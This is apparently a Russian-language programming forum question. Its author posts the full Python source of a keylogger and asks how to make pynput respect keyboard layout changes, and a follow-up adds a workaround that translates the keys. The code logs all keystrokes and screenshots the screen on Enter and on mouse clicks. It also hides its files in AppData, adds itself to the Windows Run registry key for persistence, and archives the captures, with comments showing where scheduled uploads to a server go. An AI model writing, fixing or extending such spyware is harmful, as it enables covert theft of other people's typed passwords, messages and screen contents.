# Как сделать так, чтобы модуль pynput не зависел только от заранее установленной раскладки компьютера

Tags: python, pynput

У меня есть кейлоггер, который записывает все логи в текстовик, делает скриншоты в нужную мне папку при нажатии определённых клавиш и так далее.

Но есть одна беда - модуль pynput никак не реагирует на смену раскладки клавиатуры (к примеру когда при запуске программы у меня стояла русская раскладка клавиатуры и в логи записываются русские буквы, но при смене раскладки на английскую программа с модулем pynput продолжает выводить лишь русские буквы).

**Есть возможность сделать так, чтобы модуль pynput реагировал на смену языка на компьютере и записывал логи исходя из того, какая именно раскладка выбрана?**

Код:

```
from pynput import keyboard
from pynput import mouse
from winreg import *
from os import path
import os
import pyautogui
import time
import py7zr
import socket
import datetime
import requests
import threading

check_ip = '[' + socket.gethostbyname(socket.gethostname()) + ']'
log = ''
count_screenshot = 0
counter_for_screenshot = 0
now = datetime.datetime.now()
strnow = now.strftime("[%H;%M;%S]")

try:
    try:
        os.makedirs("C:\\Users\\user\\AppData\\Cache\\screenshots")
    except FileExistsError:
        pass

    os.chdir('C:\\Users\\user\\AppData\\Cache')

    with py7zr.SevenZipFile(strnow + '.7z', 'w') as z:
        try:
            z.writeall('screenshots')
        except Exception:
            pass

    def delete_photos():
        try:
            os.chdir('C:\\Users\\user\\AppData\\Cache\\screenshots')
            path = os.chdir("C:\\Users\\user\\AppData\\Cache\\screenshots")
            files = os.listdir(path)
            photos = list(filter(lambda x: x.endswith(
                ".jpg"), files))
            count = range(len(photos))
            for i in count:
                os.remove(photos[i])
            os.chdir('C:\\Users\\user\\AppData\\Cache')
        except Exception:
            pass


    def delete_archives():
        path = os.chdir("C:\\Users\\user\\AppData\\Cache")
        files = os.listdir(path)
        archives = list(filter(lambda x: x.endswith(
            ".7z"), files))
        count = range(len(archives))
        for i in count:
            os.remove(archives[i])


    try:
        if requests.get("https://google.com").ok:
            delete_photos()
            delete_archives()
    except Exception:
        pass

except FileNotFoundError:
    pass


try:

    if requests.get('https://www.google.com').ok:
        try:
            os.remove(check_ip + '.7z')
        except FileNotFoundError and PermissionError:
            pass

except Exception:
    pass


def Startup():
    PathFile = path.abspath(__file__)[:-2]+'exe'
    StartupKey = OpenKey(HKEY_CURRENT_USER,
                         r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                         0, KEY_ALL_ACCESS)
    SetValueEx(StartupKey, 'Logger', 1, REG_SZ, PathFile)
    CloseKey(StartupKey)


Startup()


def create_control_file():
    os.chdir('C:\\Users\\user\\AppData\\Cache')
    now = datetime.datetime.now()

    with open(check_ip + ".txt", "a+") as log_file:
        log_file.write(now.strftime(
            "\n[Setup time: %d-%m-%Y %H:%M:%S]") + '\n\n')


create_control_file()


def process_key_press(key):
    global log
    global count_screenshot
    global counter_for_screenshot

    key = str(key)
    keyboard_shortcuts = [' [Ctrl+V] ', ' [Ctrl+C] ',
                          ' [Ctrl+X] ', ' [Ctrl+Z] ', ' [Ctrl+Y] ', ' [Ctrl+A] ', ' [Ctrl+S] ',
                          ' [VolumeUp] ', ' [VolumeDown] ']

    if len(key) == 3:
        key = key[1]

    elif key == 'Key.space':
        key = " "

    elif key == 'Key.enter':

        now = datetime.datetime.now()
        key = '\n' + now.strftime("[%d-%m-%Y %H:%M:%S]: ")
        counter_for_screenshot += 1
        count_screenshot += 1
        pyautogui.screenshot(
            f'C:\\Users\\user\\AppData\\Cache\\screenshots\\{str(count_screenshot)}.jpg')

    elif key == "'\\x16'":
        key = keyboard_shortcuts[0]
    elif key == "'\\x03'":
        key = keyboard_shortcuts[1]
    elif key == "'\\x18'":
        key = keyboard_shortcuts[2]
    elif key == "'\\x1a'":
        key = keyboard_shortcuts[3]
    elif key == "'\\x19'":
        key = keyboard_shortcuts[4]
    elif key == "'\\x01'":
        key = keyboard_shortcuts[5]
    elif key == "'\\x13'":
        key = keyboard_shortcuts[6]
    elif key == "Key.media_volume_up":
        key = keyboard_shortcuts[7]
    elif key == "Key.media_volume_down":
        key = keyboard_shortcuts[8]

    elif key == 'Key.backspace':
        key = ''
        try:
            with open(check_ip + '.txt', 'rb+') as filehandle:
                letter = str(filehandle.read())
                letter = letter[-2:-1]
                if letter == ']':
                    pass
                else:
                    filehandle.seek(-1, os.SEEK_END)
                    filehandle.truncate()
        except Exception:
            pass

    else:
        key = '[' + key[4:] + ']'

    log += str(key)

    if len(log) >= 1:
        write_file(key)
        log = ''


def write_file(key):
    with open(check_ip + ".txt", "a+") as logs:
        k = str(key)
        if k.find("key") == -1:
            logs.write(str(log))


def on_click(x, y, button, pressed):
    global count_screenshot
    global counter_for_screenshot
    if pressed and button == mouse.Button.left:
        counter_for_screenshot += 1
        count_screenshot += 1
        pyautogui.screenshot(
            f'C:\\Users\\user\\AppData\\Cache\\screenshots\\{str(count_screenshot)}.jpg')


def read_mtime_and_send():
    while True:
        global counter_for_screenshot
        now = datetime.datetime.now()
        strnow = now.strftime("[%H;%M;%S]")
        countdown = time.time() - os.path.getmtime(check_ip + '.txt')
        rounded_countdown = round(countdown, 0)

        print(rounded_countdown)

        if rounded_countdown == 30 or counter_for_screenshot >= 50:
            with py7zr.SevenZipFile(strnow + '.7z', 'w') as z:
                z.writeall('screenshots')
                try:
                    if requests.get("https://google.com").ok:
                        delete_photos()
                except Exception:
                    pass
            try:
                if strnow == "[04;00;00]":
                    #тут вызываются функции отправки на сервер из другого файла
                    if requests.get("https://google.com").ok:
                        delete_archives()
                if strnow == "[16;00;00]":
                    #тут вызываются функции отправки на сервер из другого файла
                    if requests.get("https://google.com").ok:
                        delete_archives()
                if strnow == "[22;00;00]":
                    #тут вызываются функции отправки на сервер из другого файла
                    if requests.get("https://google.com").ok:
                        delete_archives()

            except Exception:
                pass
            counter_for_screenshot = 0
        time.sleep(1)


def mouse_detect():
    with mouse.Listener(on_click=on_click) as mouse_listener:
        mouse_listener.join()


def start_threads():
    thread1.start()
    thread2.start()


if __name__ == '__main__':
    thread1 = threading.Thread(target=mouse_detect)
    thread2 = threading.Thread(target=read_mtime_and_send)
    keyboard_listener = keyboard.Listener(on_press=process_key_press)

    with keyboard_listener:
        start_threads()
        keyboard_listener.join()
```

*P.s уже существует подобный вопрос, но там к сожалению лишь частичное решение проблемы*

*P.s.s как оказалось, частичное решение проблемы из того вопроса в моём случае бесполезно*

*P.s.s.s. я нашёл способ, который переделывает все буквы в латинские, но это костыльный способ выйти из положения. Вот вам код:*

```
import datetime
import pyautogui
import os
import py_win_keyboard_layout
from pynput import keyboard
from os import path


def process_key_press(key):
    global log
    global counter_for_screenshot
    detect_language = py_win_keyboard_layout.get_foreground_window_keyboard_layout()

    key = str(key)

    keyboard_shortcuts = [' {Ctrl+V} ', ' {Ctrl+C} ', ' {Ctrl+X} ',
                          ' {Ctrl+Z} ', ' {Ctrl+Y} ', ' {Ctrl+A} ', ' {Ctrl+S} ']

    if len(key) == 3:
        key = key[1]

    elif key == 'Key.space':
        key = " "

    elif key == "Key.backspace":
        key = ''
        try:
            with open(check_ip + '.txt', 'rb+') as filehandle:
                letter = str(filehandle.read())
                letter = letter[-2:-1]
                if letter == '}':
                    pass
                else:
                    filehandle.seek(-1, os.SEEK_END)
                    filehandle.truncate()
        except Exception:
            pass

    elif key == "Key.enter":
        now = datetime.datetime.now()
        strnow_for_screenshots = now.strftime(
            "[%d-%m-%Y %H;%M;%S;%f")[:-3] + ']'
        key = '\n' + now.strftime("{%d-%m-%Y %H:%M:%S} ")
        counter_for_screenshot += 1
        pyautogui.screenshot(
            f'C:\\Users\\{check_user}\\AppData\\Cache\\screenshots\\{strnow_for_screenshots}.jpg')

    elif key == "'\\x16'":
        key = keyboard_shortcuts[0]
    elif key == "'\\x03'":
        key = keyboard_shortcuts[1]
    elif key == "'\\x18'":
        key = keyboard_shortcuts[2]
    elif key == "'\\x1a'":
        key = keyboard_shortcuts[3]
    elif key == "'\\x19'":
        key = keyboard_shortcuts[4]
    elif key == "'\\x01'":
        key = keyboard_shortcuts[5]
    elif key == "'\\x13'":
        key = keyboard_shortcuts[6]
    else:
        key = '{' + key[4:] + '}'

    if detect_language != 67699721:
        key = key.translate(from_ukranian_to_english_layout)
        key = key.translate(from_russian_to_english_layout)
    else:
        key = key.translate(from_ukranian_to_english_layout)
        key = key.translate(from_russian_to_english_layout)

    log += str(key)

    if len(log) >= 1:
        write_file(key)
        log = ''


def write_file(key):
    with open(check_ip + ".txt", "a+") as logs:
        k = str(key)
        if k.find("key") == -1:
            logs.write(str(log))

if __name__ == '__main__':
    keyboard_listener = keyboard.Listener(on_press=process_key_press)
        with keyboard_listener:
            keyboard_listener.join()
```

*Имейте в виду, что условие if detect_language стоит между условиями определяемых клавиш и до log += str(key) не просто так, это надо чтобы из-за перевода он случайно не перевёл точки в слэши в Key.enter и др, чтобы условия выше выполнялись как надо, поэтому расположение условия if detect_language должно быть именно таким.*